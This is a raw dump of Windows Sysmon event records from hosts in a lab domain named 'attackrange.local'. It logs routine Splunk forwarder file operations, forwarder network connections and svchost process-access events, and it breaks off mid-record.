AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1159-false10.0.1.12-8000- 23542300x80000000000000001095264Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:36.633{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CD05D0501426DD2028FB02418E8F7A5,SHA256=ECAD671041FAB774632F3ECEAEE0E7DFD5A5F0FC79716A703B04029C25F55006,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095263Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:36.515{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095262Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:36.515{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095261Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:36.093{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=498BE96DEBDBFC9CD9E4460C031383E8,SHA256=8067A93F0D98BFB5C8101DA6903AB98273E84414DFD851963F8B7378E8F3F1CA,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606558Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:37.946{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606557Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:37.946{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=849E2B603171B73555D527872FC5F1EE,SHA256=746064D29E63240B1FFF2519996C68EB8600A720D828B35F1E2A9E996E108C71falsefalse - insufficient disk space 23542300x80000000000000001095268Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:37.639{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB049457F06B575B0228FC3E3BFB7D58,SHA256=B6B48DA376DAB747930DF6E71DE1F1D552275ECAAF0E72586654D6EEE70CCA36,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095267Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:37.516{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095266Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:37.516{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606560Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:38.964{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606559Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:38.964{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=307EF100D190AABE86124375632405B2,SHA256=96C294C554EE3845366EC8E6CEB3A9FFDFB42F9E58C5C5A98E61EA7932800890falsefalse - insufficient disk space 23542300x80000000000000001095271Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:38.649{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0B96D57FB12D25A2415F71CD6C286BA,SHA256=562295BC6348DB51CA3945E8AD41B82DD621765840DC62C6A5F1941AAB0B8A0B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095270Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:38.517{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095269Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:38.517{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606567Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:39.966{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606566Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:39.966{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14A7C39DE5BD8A5706C5EEE698DBBD29,SHA256=7A2D21FA4A4B688E1892F78B0AECBA566623A66C275F288B038CFD8520804471falsefalse - insufficient disk space 23542300x80000000000000001095274Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:39.653{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C4E96A077CCB4E92F5BCA0BA2700702,SHA256=0CC0857335C61B95C7BB43EA166045AFBE88C2C1AAEA35F942F9D324FE0029E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001606565Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:37.762{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49734-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606564Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:39.249{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606563Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:39.249{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=05845FA7006DE939CD04892F44D6EECE,SHA256=B736DB483C48D70A1B1C89D815986D2565F5F3042BBCFE5298EF3296C74456A5falsefalse - insufficient disk space 11241100x80000000000000001606562Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:39.249{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606561Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:39.249{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7E9474A9EADFC2B125A0D69830B75271,SHA256=8D9881E357FF80DA711C4F8E02D7F9A14D63A6C20A3F0D8A21E81F44D3480FBAfalsefalse - insufficient disk space 10341000x80000000000000001095273Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:39.518{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095272Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:39.518{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606569Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:40.969{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606568Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:40.969{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70938E213681DB9FB8C716D3B0335871,SHA256=5EA45A0AF43A61D2E3651C91F6C5C86C280CF50C631F4519C13ACEBEB11352A0falsefalse - insufficient disk space 23542300x80000000000000001095278Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:40.657{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21BEF0005C1FA5B0DBFEC6DB4F210AAF,SHA256=39FCA2B0538B8C50D02793C74F9DE890983DC9B67A98EE4C0C645CC838B2FBBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095277Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:40.518{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095276Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:40.518{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095275Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:40.381{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CABE4C814560937ED11DA6AB88F25692,SHA256=B5B0513CC19D4A02998804D36D1A1C84B09796C39A7DAC72A82A4B43F2BEEABF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606571Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:41.971{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606570Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:41.971{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E6791E2BBB1D08F510CD76BB8FAA5CE,SHA256=491FE1B13B22146E5F02C4F29D1DC1882B8D562ED5F7D52888466856FC89D56Cfalsefalse - insufficient disk space 354300x80000000000000001095282Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:36.820{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1160-false10.0.1.12-8000- 23542300x80000000000000001095281Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:41.666{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9758FD184E1F0A325FBDFC1A02B369D8,SHA256=B091F7D0F4523D7703A16475A29A41604743321D5DB845AF96BD3F4AD705EED5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095280Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:41.518{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095279Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:41.518{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606573Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:42.974{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606572Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:42.974{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=376EE83E11DE7EFCA799FD4B6BD5E290,SHA256=64C5C3547A01E409D547B2486F80648EFCDF2DE388F11A156EE83687D89C5AF4falsefalse - insufficient disk space 23542300x80000000000000001095285Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:42.669{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=227F2CB24136EFE45B35D8FE41C8A275,SHA256=8BA32F7D6692AA51B4924885375DAD3A4590814B79FB4BE1691EFD41D1787E9F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095284Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:42.518{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095283Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:42.518{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606575Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:43.992{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606574Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:43.992{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA65B7059E5706024727429682E880EC,SHA256=915CB2534207A2E650DADD6C33D6C939803604F332B0675F87D0FD7945A77D05falsefalse - insufficient disk space 23542300x80000000000000001095288Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:43.679{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B1BDE2142BAB2C5480672B1C41F8A84,SHA256=F7DFFEDCB809810EB6776C3A50C732B59720D05CBD084633EE062858BBE51438,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095287Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:43.519{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095286Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:43.519{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095291Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:44.687{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 